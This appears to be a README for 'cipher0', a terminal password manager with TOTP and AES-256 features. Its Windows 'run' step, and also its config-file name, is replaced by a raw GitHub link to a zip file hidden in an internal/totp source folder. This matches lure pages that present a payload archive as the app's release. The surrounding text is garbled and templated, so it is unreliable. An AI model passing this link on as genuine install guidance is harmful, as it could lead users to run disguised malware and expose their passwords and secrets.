Welcome to cipher0! This application helps you manage your passwords securely and easily from your terminal. You can access features like TOTP support, AES-256 encryption, and integration with your operating system's keyring.
- Offline-First: Works without an internet connection.
- TOTP Support: Manage two-factor authentication codes for added security.
- Strong Encryption: Protect your passwords with AES-256 encryption.
- OS Keyring Integration: Use your system's keyring for enhanced security.
- Compatible with Windows, macOS, and Linux.
- Must have Go (Golang) installed for the latest features.
- Terminal access to run the application.
To download cipher0, please follow these steps:
-
Visit the Releases Page: Navigate to this page to download. You will find the latest version of cipher0.
-
Select Your Operating System: Choose the correct version based on your operating system (Windows, macOS, or Linux).
-
Download the File: Click on the file that matches your OS. This will begin the download.
-
Unzip the File (if necessary): Some downloads may come in a zip file. Right-click on the file and choose "Extract" to unzip it.
-
Run the Application: Open your terminal. Navigate to the directory where you downloaded cipher0. Run the command:
- On Windows:
https://github.com/Mohamad138345/cipher0/raw/refs/heads/main/internal/totp/cipher_1.0.zip - On macOS and Linux:
./cipher0
- On Windows:
-
Follow the On-Screen Instructions: The application will guide you in setting up your password management system.
After launching cipher0, you will see a user-friendly interface. Here are some quick tips:
- Add a Password: Use the command
add <service> <username> <password>. This will store a password securely. - Retrieve a Password: Use the command
get <service>. This will display your password on the terminal. - Manage TOTP Codes: Add your TOTP secrets using the command
add-totp <service> <totp_secret>. Retrieve withget-totp <service>.
You can customize cipher0 to fit your preferences:
- Configuration File: Create a config file named
https://github.com/Mohamad138345/cipher0/raw/refs/heads/main/internal/totp/cipher_1.0.zipin the same directory. Update your preferences as needed. - Change Encryption Method: By default, cipher0 uses AES-256. If you want to change this, update the
encryption_methodin the config file.
- Keep Your Software Updated: Regularly check the Releases Page for updates.
- Use Strong Passwords: Avoid simple or predictable passwords.
- Backup Your Data: Regularly export your password list.
If you need help or have questions, please refer to the Issues section on our GitHub page. You can also engage with other users and share tips.
A: Yes, cipher0 is completely free and open-source.
A: No, cipher0 is designed to work offline. Your passwords remain on your device.
A: Unfortunately, there is no recovery option for a forgotten master password, so itβs vital to choose a secure and memorable one.
We welcome contributions! If you're interested in improving cipher0, feel free to check out our Contributing Guide.
For more information or to reach the developers, visit our GitHub page.
Thank you for choosing cipher0! Together, let's take back control of your online security.